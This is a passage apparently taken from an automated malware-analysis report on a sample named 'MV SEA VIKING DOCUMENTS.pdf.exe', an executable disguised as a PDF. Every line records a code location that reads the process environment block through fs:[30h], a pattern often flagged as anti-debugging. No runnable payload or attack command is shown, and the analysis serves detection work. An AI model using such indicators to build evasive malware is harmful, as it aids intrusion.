      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245E40E mov eax, dword ptr fs:[00000030h]0_2_0245E40E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245F89B mov eax, dword ptr fs:[00000030h]0_2_0245F89B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245754E mov eax, dword ptr fs:[00000030h]0_2_0245754E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov eax, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov eax, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov ecx, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov ecx, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1ECF00 mov eax, dword ptr fs:[00000030h]13_2_1F1ECF00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1ECF00 mov eax, dword ptr fs:[00000030h]13_2_1F1ECF00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FF03 mov eax, dword ptr fs:[00000030h]13_2_1F24FF03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FF03 mov eax, dword ptr fs:[00000030h]13_2_1F24FF03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FF03 mov eax, dword ptr fs:[00000030h]13_2_1F24FF03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFF30 mov edi, dword ptr fs:[00000030h]13_2_1F1CFF30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BF0C mov eax, dword ptr fs:[00000030h]13_2_1F20BF0C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BF0C mov eax, dword ptr fs:[00000030h]13_2_1F20BF0C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BF0C mov eax, dword ptr fs:[00000030h]13_2_1F20BF0C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4F1D mov eax, dword ptr fs:[00000030h]13_2_1F2A4F1D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EF66 mov eax, dword ptr fs:[00000030h]13_2_1F28EF66
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F226F70 mov eax, dword ptr fs:[00000030h]13_2_1F226F70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4F7C mov eax, dword ptr fs:[00000030h]13_2_1F2A4F7C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BF4D mov eax, dword ptr fs:[00000030h]13_2_1F28BF4D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEF79 mov eax, dword ptr fs:[00000030h]13_2_1F1CEF79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEF79 mov eax, dword ptr fs:[00000030h]13_2_1F1CEF79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEF79 mov eax, dword ptr fs:[00000030h]13_2_1F1CEF79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBF70 mov eax, dword ptr fs:[00000030h]13_2_1F1CBF70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1F70 mov eax, dword ptr fs:[00000030h]13_2_1F1D1F70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAF72 mov eax, dword ptr fs:[00000030h]13_2_1F1FAF72
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28AF50 mov ecx, dword ptr fs:[00000030h]13_2_1F28AF50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FBF93 mov eax, dword ptr fs:[00000030h]13_2_1F1FBF93
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov ecx, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F208FBC mov eax, dword ptr fs:[00000030h]13_2_1F208FBC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D4FB6 mov eax, dword ptr fs:[00000030h]13_2_1F1D4FB6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F8B mov eax, dword ptr fs:[00000030h]13_2_1F258F8B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F8B mov eax, dword ptr fs:[00000030h]13_2_1F258F8B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F8B mov eax, dword ptr fs:[00000030h]13_2_1F258F8B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCFB0 mov eax, dword ptr fs:[00000030h]13_2_1F1FCFB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCFB0 mov eax, dword ptr fs:[00000030h]13_2_1F1FCFB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1FAA mov eax, dword ptr fs:[00000030h]13_2_1F1D1FAA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C9FD0 mov eax, dword ptr fs:[00000030h]13_2_1F1C9FD0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4FFF mov eax, dword ptr fs:[00000030h]13_2_1F2A4FFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBFC0 mov eax, dword ptr fs:[00000030h]13_2_1F1CBFC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F8FFB mov eax, dword ptr fs:[00000030h]13_2_1F1F8FFB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov ecx, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EFD3 mov eax, dword ptr fs:[00000030h]13_2_1F28EFD3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBE18 mov ecx, dword ptr fs:[00000030h]13_2_1F1CBE18
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E14 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E14
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E14 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E14
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E14 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E14
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F266E30 mov eax, dword ptr fs:[00000030h]13_2_1F266E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F266E30 mov eax, dword ptr fs:[00000030h]13_2_1F266E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov ecx, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E01 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E01
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CE3F mov eax, dword ptr fs:[00000030h]13_2_1F20CE3F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4E03 mov eax, dword ptr fs:[00000030h]13_2_1F2A4E03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2E32 mov eax, dword ptr fs:[00000030h]13_2_1F1D2E32
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F208E15 mov eax, dword ptr fs:[00000030h]13_2_1F208E15
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4E62 mov eax, dword ptr fs:[00000030h]13_2_1F2A4E62
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EE78 mov eax, dword ptr fs:[00000030h]13_2_1F28EE78
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CE70 mov eax, dword ptr fs:[00000030h]13_2_1F20CE70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F207E71 mov eax, dword ptr fs:[00000030h]13_2_1F207E71
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FEE48 mov eax, dword ptr fs:[00000030h]13_2_1F1FEE48
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CDE45 mov eax, dword ptr fs:[00000030h]13_2_1F1CDE45
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CDE45 mov ecx, dword ptr fs:[00000030h]13_2_1F1CDE45
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CAE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CAE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CAE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CAE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CAE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CAE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CFE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1E70 mov eax, dword ptr fs:[00000030h]13_2_1F1D1E70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov ecx, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBE60 mov eax, dword ptr fs:[00000030h]13_2_1F1CBE60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBE60 mov eax, dword ptr fs:[00000030h]13_2_1F1CBE60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CEA0 mov eax, dword ptr fs:[00000030h]13_2_1F20CEA0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F290EAD mov eax, dword ptr fs:[00000030h]13_2_1F290EAD
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F290EAD mov eax, dword ptr fs:[00000030h]13_2_1F290EAD
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAE89 mov eax, dword ptr fs:[00000030h]13_2_1F1FAE89
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAE89 mov eax, dword ptr fs:[00000030h]13_2_1F1FAE89
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202EB8 mov eax, dword ptr fs:[00000030h]13_2_1F202EB8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202EB8 mov eax, dword ptr fs:[00000030h]13_2_1F202EB8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FBE80 mov eax, dword ptr fs:[00000030h]13_2_1F1FBE80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F201EED mov eax, dword ptr fs:[00000030h]13_2_1F201EED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F201EED mov eax, dword ptr fs:[00000030h]13_2_1F201EED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F201EED mov eax, dword ptr fs:[00000030h]13_2_1F201EED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EEE7 mov eax, dword ptr fs:[00000030h]13_2_1F28EEE7
